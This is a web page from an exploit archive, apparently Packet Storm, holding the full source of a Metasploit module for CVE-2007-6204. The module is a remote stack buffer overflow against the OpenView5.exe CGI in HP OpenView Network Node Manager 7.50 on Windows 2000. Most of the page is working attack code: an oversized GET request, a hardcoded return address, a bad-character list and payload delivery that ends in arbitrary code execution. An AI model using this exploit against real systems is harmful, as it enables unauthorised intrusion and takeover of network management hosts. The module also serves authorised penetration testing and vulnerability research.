HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow

HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow: Posted Dec 31, 2009; Authored by MC | Site metasploit.com; This Metasploit module exploits a stack overflow in HP OpenView Network Node Manager 7.50. By sending a specially crafted CGI request, an attacker may be able to execute arbitrary code.; tags | exploit, overflow, arbitrary, cgi; advisories | CVE-2007-6204; SHA-256 | 66583a0594555d5fbb4ef434ba4d8cbbf81f63ce0361f95c46aa5ece2a9e0693; Download | Favorite | View

HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow

##
# $Id: hp_nnm_openview5.rb 7874 2009-12-15 05:41:29Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,  
      'Name'           => 'HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack overflow in HP OpenView Network Node Manager 7.50.
          By sending a specially crafted CGI request, an attacker may be able to execute
          arbitrary code.
      },
      'Author'         => [ 'MC' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 7874 $',
      'References'     =>
        [
          [ 'CVE', '2007-6204' ],
          [ 'OSVDB', '39530' ],
          [ 'BID', '26741' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 650,
          'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        => 
        [
          [ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll 
        ],
      'DefaultTarget'  => 0,      
      'DisclosureDate' => 'Dec 6 2007'))
      
      register_options( [ Opt::RPORT(80) ], self.class )

  end

  def exploit
    connect

    sploit =  "GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" + rand_text_alpha_upper(5123)
    sploit << [target.ret].pack('V') + payload.encoded 
    
    print_status("Trying target %s..." % target.name)
    sock.put(sploit + "\r\n\r\n")
    
    handler
    disconnect
  end

end

Top Authors In Last 30 Days

Red Hat 220 files
indoushka 88 files
Ubuntu 84 files
Gentoo 36 files
Jasper Nota 25 files
Debian 20 files
Willem Westerhof 19 files
Jim Blankendaal 11 files
Martijn Baalman 9 files
Apple 9 files

File Archives

Systems

AIX (429)
Apple (2,099)
BSD (377)
CentOS (58)
Cisco (1,927)
Debian (7,098)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,567)
HPUX (880)
iOS (378)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,715)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,486)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,742)
UNIX (9,435)
UnixWare (187)
Windows (6,672)
Other

HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow

HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow

Share This

HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow

File Archive:

August 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems